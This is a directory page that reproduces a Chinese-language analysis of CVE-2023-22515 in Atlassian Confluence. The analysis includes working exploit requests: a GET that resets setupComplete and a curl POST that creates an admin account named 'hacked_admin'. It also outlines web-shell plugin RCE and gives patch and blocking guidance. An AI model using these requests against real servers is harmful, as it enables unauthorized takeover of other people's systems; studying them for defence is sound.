Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-22515 — CVE-2023-22515 的详细分析与概念验证漏洞利用,这是 Atlassian Confluence Data Center 和 Server 中的一个严重越权访问控制漏洞,可导致未认证管理员账户创建及潜在的远程代码执行。 | Kitploit
工具/GitHubGitHub/dkq-k/cve-2023-22515
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队
GitHubdkq-k/cve-2023-22515

CVE-2023-22515

CVE-2023-22515 的详细分析与概念验证漏洞利用,这是 Atlassian Confluence Data Center 和 Server 中的一个严重越权访问控制漏洞,可导致未认证管理员账户创建及潜在的远程代码执行。

查看仓库
7个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-22515: Confluence Data Center & Server 权限提升漏洞分析报告

1. 概述 (Overview)

CVE-2023-22515是Atlassian Confluence Data Center及Server产品中发现的一个严重的(Critical) Broken Access Control漏洞。攻击者可以在未认证状态下远程重新激活服务器的初始设置过程,并通过此过程创建新的管理员账户,从而完全控制系统。

  • CVE ID: CVE-2023-22515
  • CVSS Score: 10.0 (Critical)
  • 受影响版本: 8.0.0 ~ 8.5.1 (部分版本除外)

2. 漏洞详细分析 (Vulnerability Analysis)

原因 (Root Cause)

该漏洞的核心在于XWork2框架的参数绑定机制与Confluence的Action处理逻辑之间的验证不足。

攻击者可以通过URL参数将bootstrapStatusProvider.applicationConfig.setupComplete的值篡改为false。该属性是Confluence判断安装及配置是否完成的重要标志。

root@kitploit:~
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: <target-ip>

发送上述请求后,服务器会在内存中认为配置尚未完成。这并不会修改永久配置文件(confluence.cfg.xml),但可以在运行时更改状态,从而绕过访问控制。

攻击机制 (Attack Mechanism)

  1. 重置配置状态: 攻击者访问公开端点(如/server-info.action)并传递参数bootstrapStatusProvider.applicationConfig.setupComplete=false。
  2. 绕过访问控制: 服务器现在将自身视为"正在安装"状态,因此对/setup/*下的管理员配置页面的访问限制被解除。
  3. 创建管理员账户: 攻击者访问/setup/setupadministrator.action页面并创建新的系统管理员(System Administrator)账户。
  4. 控制系统: 使用创建的管理员账户登录,获取系统的所有权限。通过此权限,可以上传Web Shell、泄露数据、部署勒索软件等进一步恶意行为。

3. 漏洞复现 (Reproduction)

环境搭建 (Environment Setup)

使用Docker搭建了存在漏洞的版本(8.5.1)的Confluence Server。

  • Docker Image: atlassian/confluence-server:8.5.1
  • Database: PostgreSQL 14

docker-compose.yml (摘要):

root@kitploit:~
services:
  confluence:
    image: atlassian/confluence-server:8.5.1
    ports:
      - "8090:8090"
    environment:
      - ATL_DB_TYPE=postgresql
      # ... DB配置 ...

漏洞利用执行 (Exploitation)

为避免Python依赖问题,使用基于curl的Bash脚本编写并执行了PoC。

漏洞利用流程 (Exploit Flow):

  1. 重置设置状态 (Reset Setup Status):

    root@kitploit:~
    curl -v "http://localhost:8090/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false"
    

    结果: 返回HTTP 302重定向响应,确认内部设置完成状态已被解除。

  2. 创建管理员 (Create Administrator):

    root@kitploit:~
    curl -X POST "http://localhost:8090/setup/setupadministrator.action" \
      -H "X-Atlassian-Token: no-check" \
      --data "username=hacked_admin&password=p@ssw0rd123&..."
    

    结果: 通过该请求尝试创建hacked_admin账户,之后可以在登录页面使用该账户访问。

4. 应对方案 (Mitigation)

补丁应用 (Patch)

应立即升级至Atlassian提供的最新版本。

  • Fixed Versions: 8.3.3, 8.4.3, 8.5.2及以上

临时缓解措施 (Workaround)

如果无法打补丁,应在网络层面(负载均衡器、WAF、反向代理等)阻止对/setup/*端点的访问。

  • 屏蔽目标URL: /setup/*

6. 深入攻击:RCE(远程代码执行)场景

CVE-2023-22515获取管理员权限后,攻击者可进一步执行系统命令(RCE)。

概述

Confluence向管理员提供插件(Add-on)安装权限。攻击者利用此权限上传包含Web Shell功能的恶意插件,从而获取服务器操作系统的控制权。

攻击链 (Attack Chain)

  1. 创建管理员账户 (CVE-2023-22515): 按前述方法获取系统管理员权限。
  2. 完成设置技巧: 如果服务器仍处于"设置模式",可通过访问/setup/finishsetup.action等强制完成设置(需要绕过许可),或利用现有会话浏览可访问的管理菜单。
  3. 上传恶意插件:
    • 菜单: Confluence Administration -> Manage Apps -> Upload App
    • 文件: 包含恶意Java类文件的.jar文件
  4. 命令执行:
    • 访问上传插件提供的URL(例如/plugins/servlet/webshell?cmd=id)执行系统命令。

当前复现环境的限制

本实验环境(Docker)没有有效的Confluence许可,无法完成初始设置阶段。因此,创建管理员账户的请求虽然成功(302重定向),但后续的插件菜单访问及实际RCE执行受限。在实际生产环境中,由于已注册许可,可以立即进行RCE,没有这些限制。

7. 结论 (Conclusion)

CVE-2023-22515是一个无需认证即可获取管理员权限的极其危险的漏洞。仅通过简单的URL参数操纵即可发起攻击,攻击难度极低。因此,使用该版本的组织应立即应用补丁或缓解措施。

下载工具